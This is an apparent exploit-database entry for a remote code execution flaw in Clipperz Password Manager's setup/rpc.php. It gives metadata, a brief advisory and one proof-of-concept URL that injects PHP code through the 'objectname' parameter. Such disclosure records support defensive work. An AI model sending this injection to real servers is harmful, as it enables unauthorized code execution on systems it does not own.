Clipperz Password Manager - '/backend/PHP/src/setup/rpc.php' Remote Code Execution

Author: Manish Tanwar
type: webapps
platform: php
port: 
date_added: 2014-05-20
date_updated: 2016-01-07
verified: 1
codes: OSVDB-107137
tags: 
aliases: 
screenshot_url: 
application_url: 

source: https://www.securityfocus.com/bid/67498/info

Clipperz Password Manager is prone to remote code-execution vulnerability.

Attackers can exploit this issue to execute arbitrary code in the context of the affected application.

http://www.example.com/password-manager-master/backend/php/src/setup/rpc.php?objectname=Xmenu();print_r(php_uname());die